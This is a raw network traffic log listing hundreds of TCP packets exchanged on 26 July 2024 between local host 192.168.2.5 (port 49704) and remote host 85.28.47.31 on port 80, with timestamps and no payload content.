Jul 26, 2024 17:56:16.057257891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057257891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057276964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057284117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057296991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057305098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057317019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057324886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057337999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057346106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057360888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057368994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057380915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057384968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057399988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057401896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057423115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.057425976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057434082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.057467937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.112863064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.112900972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.112941027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.112955093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.112967014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.112988949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.113003969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.113023043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.113033056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.113056898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.113090038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.113106966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.113236904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.113289118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127240896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127276897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127306938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127319098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127336979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127352953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127367973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127387047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127404928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127423048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127439022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127473116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127506018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127507925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127523899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127538919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127556086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127573967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127583981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127608061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127626896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127641916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127656937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127676964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.127691031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.127722979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128323078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128357887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128396988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128408909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128420115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128443003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128463030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128477097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128515005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128526926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128537893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128577948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128595114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128628969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128642082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128662109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128674030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128750086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128778934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128783941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128817081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128817081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128833055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128871918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128879070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128906012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128926992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128938913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.128947973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.128976107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129002094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129018068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129025936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129050970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129069090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129085064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129101992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129117966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129132986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129152060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129184008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129206896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129213095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129259109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129259109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129291058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129307985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129327059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129338980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129359961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129378080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129393101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129403114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129426003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129448891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129458904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129467964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129492044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129508018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129524946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129540920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129559040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129575968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129594088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129607916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129627943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129641056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129661083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129690886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129694939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129719019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129729033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129743099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129761934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129776001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129796028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129808903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129831076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.129858971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.129873991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130111933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130145073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130179882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130188942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130189896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130214930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130243063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130261898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130266905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130300999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130326986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130333900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130346060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130366087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130394936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130398989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130410910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130433083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130450964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130465984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130480051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130500078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130512953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130532980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130558968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130567074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130577087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130600929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130615950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130644083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130651951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130685091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130711079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130728006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130760908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130765915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130781889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130795002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130820036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130829096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130839109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130865097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130897999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130901098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130920887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130932093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130950928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130965948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.130990982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.130999088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131009102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131032944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131047010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131067991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131098986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131102085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131118059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131135941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131165981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131171942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131186008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131205082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131222010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131241083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131256104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131277084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131289005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131310940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131339073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131341934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.131357908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.131392002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145277023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145308971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145343065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145370960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145375967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145390987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145407915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145416975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145416975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145442963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145467043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145476103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145487070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145509005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145535946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145543098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145559072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145576000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145587921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145610094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145626068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145644903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145658016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145678997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145698071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145711899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.145729065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.145756960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207550049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207606077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207633972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207642078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207657099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207675934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207685947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207710028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207717896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207743883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207752943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207777977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.207783937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.207820892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.215818882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.215853930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.215889931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.215976954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.216413975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.216447115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.216470003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.216500044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.216510057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.216533899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.216542959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.216566086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.216576099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.216609001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217458010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217509031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217510939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217542887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217556953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217576981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217592001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217611074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217638969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217657089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217663050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217698097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217710018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217730045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217742920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217762947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217781067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217808008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217813969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217860937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217865944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217900038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217915058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217933893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217946053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.217977047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.217991114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218009949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218020916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218044043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218056917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218077898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218091965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218111992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218126059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218147039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218162060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218183994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218183994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218218088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218254089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218272924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218292952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218326092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218347073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218359947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218367100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218391895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218404055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218425989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218436956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218458891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218492031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218522072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218525887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218553066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218559980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218580961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218590975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218601942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218626022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218638897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218660116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.218674898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.218693972 CEST	80	49704	85.28.47.31	192.168.2.5
